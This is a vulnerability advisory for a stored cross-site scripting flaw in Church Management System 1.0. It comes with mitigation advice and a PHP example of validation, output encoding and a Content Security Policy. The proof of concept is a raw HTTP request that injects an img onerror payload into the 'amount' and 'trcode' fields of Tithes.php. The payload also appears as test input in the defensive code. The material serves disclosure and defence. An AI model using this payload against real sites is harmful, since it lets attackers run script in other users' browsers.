Vendor: Church Management System
By: Murat DEMIRCI
CVSS: 7.5 (HIGH)
Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: Church Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Platforms Tested: Windows 10
2021

Church Management System 1.0 – ‘Multiple’ Stored Cross-Site Scripting (XSS)

The Church Management System 1.0 is vulnerable to multiple stored cross-site scripting (XSS) attacks. An attacker can inject malicious code into the 'amount' and 'trcode' parameters, which are not properly sanitized, leading to the execution of arbitrary JavaScript code in the context of the user's browser.

Mitigation:

To mitigate this vulnerability, implement input validation and sanitization on all user-supplied data. Additionally, a Content Security Policy (CSP) can help mitigate the impact of XSS attacks.
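
One way to apply the mitigation above to the two injectable fields, as an added example that is not code from Church Management System or from the advisory. The field formats (decimal amount, alphanumeric trcode), the helper names validate_amount, validate_trcode and e, the CSP value and the sample submissions are assumptions.

```php
<?php
declare(strict_types=1);

// Added example. Assumed formats: amount is a non-negative decimal with up
// to two fraction digits; trcode is 1-32 letters, digits or hyphens.

function validate_amount(string $raw): ?string
{
    $raw = trim($raw);
    return preg_match('/\A\d{1,9}(\.\d{1,2})?\z/', $raw) === 1 ? $raw : null;
}

function validate_trcode(string $raw): ?string
{
    $raw = trim($raw);
    return preg_match('/\A[A-Za-z0-9-]{1,32}\z/', $raw) === 1 ? $raw : null;
}

// Output encoding for HTML text and quoted attribute contexts.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Defence in depth: without 'unsafe-inline', the browser does not run inline
// event handlers such as onerror= even if markup reaches the page.
if (PHP_SAPI !== 'cli') {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
}

// Constructed sample input: the PoC payload (URL-decoded) next to a
// well-formed submission.
$samples = [
    ['amount' => '<img src=x onerror=alert(1)>', 'trcode' => '<img src=x onerror=alert(1)>'],
    ['amount' => '150.00', 'trcode' => 'TR-2021-0042'],
];

foreach ($samples as $post) {
    $amount = validate_amount($post['amount']);
    $trcode = validate_trcode($post['trcode']);
    if ($amount === null || $trcode === null) {
        // Reject before storage; any echo of the input uses the encoded form.
        echo "rejected: ", e($post['amount']), " / ", e($post['trcode']), PHP_EOL;
        continue;
    }
    // Rows stored before validation existed may still hold markup, so
    // encode on every render as well.
    echo "<td>", e($amount), "</td><td>", e($trcode), "</td>", PHP_EOL;
}
```

Validation stops new payloads at write time, while encoding at render time is what neutralises values already saved in the database.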

Exploit-DB raw data:

# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10

# Proof of Concept :

#Payload: <img src=x onerror=alert(1)>
#Injectable parameters : amount=  and trcode=

###################### REQUEST ##########################################

POST /cman/members/Tithes.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/members/Tithes.php
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc
Upgrade-Insecure-Requests: 1

amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=